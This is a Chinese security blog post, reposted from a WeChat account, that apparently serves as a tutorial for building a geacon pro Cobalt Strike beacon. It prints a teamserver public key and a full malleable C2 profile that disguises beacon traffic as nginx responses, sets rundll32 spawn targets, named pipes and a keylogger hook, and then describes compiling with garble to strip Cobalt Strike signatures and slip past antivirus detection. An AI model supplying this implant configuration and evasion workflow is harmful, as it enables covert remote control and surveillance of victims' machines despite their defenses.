水一下文章
这里我们采用的是编译为exe方法,从源码入手
配置RsaPublicKey
这里我们用的环境是cs4.7 火绒,从teamserver中把beacon_key放入geacon_protoolsBeaconTooloutartifactsBeaconTool_jar 目录解密
这里我们就只需要提取公钥
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCgUinQr5wv4CQaw0pVHUb+hmc0xchaOaC4hJhc
4HVRN64MT2U2F4x+A+x2DGevp+yM1QLyQLN3sZpEpnCK8vyg2JmKGccwNak6NAg1q7Ur6ZA6nFkq
s9IhRtFw86eI3K0nRdaqRsKKDCz36YSObQEo7w0O/9qVJHeFKPe1oMJYQwIDAQAB
-----END PUBLIC KEY-----
将公钥替换掉congfig中的
之后填写
这里的C2是你的那个监听器的
这里需要注意一个点
teamserver运行时记得加上那个配置文件
作者提供了默认的配置文件
# default sleep time is 60s
set sleeptime "3000";
set jitter "7";
https-certificate {
set C "KZ";
set CN "foren.zik";
set O "NN Fern Sub";
set OU "NN Fern";
set ST "KZ";
set validity "365";
}
# define indicators for an HTTP GET
http-get {
set uri "/www/handle/doc";
client {
#header "Host" "aliyun.com";
# base64 encode session metadata and store it in the Cookie header.
metadata {
base64url;
prepend "SESSIONID=";
header "Cookie";
}
}
server {
# server should send output with no changes
#header "Content-Type" "application/octet-stream";
header "Server" "nginx/1.10.3 (Ubuntu)";
header "Content-Type" "application/octet-stream";
header "Connection" "keep-alive";
header "Vary" "Accept";
header "Pragma" "public";
header "Expires" "0";
header "Cache-Control" "must-revalidate, post-check=0, pre-check=0";
output {
mask;
netbios;
prepend "data=";
append "%%";
print;
}
}
}
# define indicators for an HTTP
http-post {
# Same as above, Beacon will randomly choose from this pool of URIs [if multiple URIs are provided]
set uri "/IMXo";
client {
#header "Content-Type" "application/octet-stream";
# transmit our session identifier as /submit.php?id=[identifier]
id {
mask;
netbiosu;
prepend "user=";
append "%%";
header "User";
}
# post our output with no real changes
output {
mask;
base64url;
prepend "data=";
append "%%";
print;
}
}
# The server's response to our HTTP POST
server {
header "Server" "nginx/1.10.3 (Ubuntu)";
header "Content-Type" "application/octet-stream";
header "Connection" "keep-alive";
header "Vary" "Accept";
header "Pragma" "public";
header "Expires" "0";
header "Cache-Control" "must-revalidate, post-check=0, pre-check=0";
# this will just print an empty string, meh...
output {
mask;
netbios;
prepend "data=";
append "%%";
print;
}
}
}
post-ex {
set spawnto_x86 "c:\windows\syswow64\rundll32.exe";
set spawnto_x64 "c:\windows\system32\rundll32.exe";
set thread_hint "ntdll.dll!RtlUserThreadStart+0x1000";
set pipename "DserNamePipe##, PGMessagePipe##, MsFteWds##";
set keylogger "SetWindowsHookEx";
}
之后直接go build
放微步看下
虽然说被识别成了恶意 但是他没有cs特征啊
这里我们用garble再次试下 ,成功上线
看下微步
还行 从牛马变成小牛马
这里免杀效果就不测了,主要的就是他没有了cs的特征
之后可以转成shellcode调用win32api 老一套加载上线
原文始发于微信公众号(老鑫安全):geacon pro使用教程
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论